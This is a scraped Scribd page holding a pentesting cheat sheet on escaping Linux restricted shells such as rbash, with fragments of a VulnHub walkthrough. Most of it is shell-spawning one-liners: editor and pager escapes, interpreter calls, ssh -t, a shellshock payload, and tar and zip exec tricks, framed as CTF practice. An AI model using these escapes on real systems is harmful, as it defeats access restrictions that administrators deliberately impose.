Scribd
Upload
28 views

Linux Restricted Shell Bypass Guide

The document discusses techniques for bypassing restricted shells, including: 1. Enumerating available commands, operators, programming languages, sudo permissions, and environment variables. 2. Common techniques like using available commands like /bin/sh or copying binaries, and exploiting programs like ftp, gdb, vim, awk, find. 3. Programming language techniques using except, python, php, perl, lua, ruby. 4. Advanced techniques like SSH with non-standard shells, exploiting SUID permissions, using git, pico, zip, tar. It recommends practicing these techniques on restricted shell challenges from Root-Me and HackTheBox.

Uploaded by

anargratos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
28 views

Linux Restricted Shell Bypass Guide

The document discusses techniques for bypassing restricted shells, including: 1. Enumerating available commands, operators, programming languages, sudo permissions, and environment variables. 2. Common techniques like using available commands like /bin/sh or copying binaries, and exploiting programs like ftp, gdb, vim, awk, find. 3. Programming language techniques using except, python, php, perl, lua, ruby. 4. Advanced techniques like SSH with non-standard shells, exploiting SUID permissions, using git, pico, zip, tar. It recommends practicing these techniques on restricted shell challenges from Root-Me and HackTheBox.

Uploaded by

anargratos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Firefox https://www.hackingarticles.

in/matrix-1-vulnhub-walkthrough/

$PATH

echo /home/guest/prog/*

echo $SHELL

!/bin/bash

1 sur 2 16/03/2023, 11:13


Firefox https://www.hackingarticles.in/matrix-1-vulnhub-walkthrough/

export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH

sudo -l
sudo su

export PATH=/bin:$PATH
sudo su

2 sur 2 16/03/2023, 11:13


Linux Restricted Shell Bypass
By @n4ckhcker & @h4d3sw0rm
Contents
[ 1 ] Introduction

[ 2 ] Enumeration Linux Environment

[ 3 ] Common Exploitation Techniques

[ 4 ] Programming Languages Techniques

[ 5 ] Advanced Techniques

[ 6 ] Time to Practice
Introduction
Hello, so first of all let’s explain what is a restricted shell ? A restricted shell is a shell
that block/restricts some of the commands like cd,ls,echo etc or
"block" the environment variables like SHELL,PATH,USER. Sometimes a restricted shell
can block the commands with / or the redirecting outputs like >,>>. The types of a
restricted shell can be : rbash,rksh,rsh. But now why someone want to create a
restricted shell ? Let’s say some examples :
1)To improve Security
2)To block hackers/pentesters.
3)Sometimes system administrators create a restricted shell to protect theirselves from
dangerous commands.
4)For a CTF Challenge. (Root-me/hackthebox/vulnhub).
Enumeration Linux Environment
Enumeration is the most important part. We need to enumeration the
Linux environmental to check what we can do to bypass the rbash.

We need to enumerate :

1) First we must to check for available commands like cd/ls/echo etc.


2) We must to check for operators like >,>>,<,|.
3) We need to check for available programming languages like
perl,ruby,python etc.
4) Which commands we can run as root (sudo -l).
5) Check for files or commands with SUID perm.
6) You must to check in what shell you are : echo $SHELL you will be in
rbash by 90%
7) Check for the Environmental Variables : run env or printenv

Now let’s move into Common Exploitation Techniques.


Common Exploitation Techniques
Now let’s see some of the common exploitation techniques.

1) If "/" is allowed you can run /bin/sh or /bin/bash.


2) If you can run cp command you can copy the /bin/sh or /bin/bash
into your directory.
3) From ftp > !/bin/sh or !/bin/bash
4) From gdb > !/bin/sh or !/bin/bash
5) From more/man/less > !/bin/sh or !/bin/bash
6) From vim > !/bin/sh or !/bin/bash
7) From rvim > :python import os; os.system("/bin/bash )
8) From scp > scp -S /path/yourscript x y:
9) From awk > awk 'BEGIN {system("/bin/sh or /bin/bash")}'
10) From find > find / -name test -exec /bin/sh or /bin/bash \;
Programming Languages Techniques
Now.. let’s look some programming languages techniques.

1) From except > except spawn sh then sh.


2) From python > python -c 'import os; os.system("/bin/sh")'
3) From php > php -a then exec("sh -i");
4) From perl > perl -e 'exec "/bin/sh";'
5) From lua > os.execute('/bin/sh').
6) From ruby > exec "/bin/sh"
Now let’s move into Advance Techniques.
Advanced Techniques
Now let's move into some dirty advance techniques.
1)From ssh > ssh username@IP - t "/bin/sh" or "/bin/bash"
2)From ssh2 > ssh username@IP -t "bash --noprofile"
3)From ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
4)From ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh"
127.0.0.1 (SUID)
5)From git > git help status > you can run it then !/bin/bash
6)From pico > pico -s "/bin/bash" then you can write /bin/bash and
then CTRL + T
7)From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c
/bin/bash"
8)From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-
action=exec=/bin/bash

C SETUID SHELL :
Time For Practise
Root-me have a INSANE rbash bypass challenge!

https://www.root-me.org/en/Challenges/App-Script/Restricted-shells

Hackthebox solidstate machine! (Easy)

https://www.hackthebox.eu/

You might also like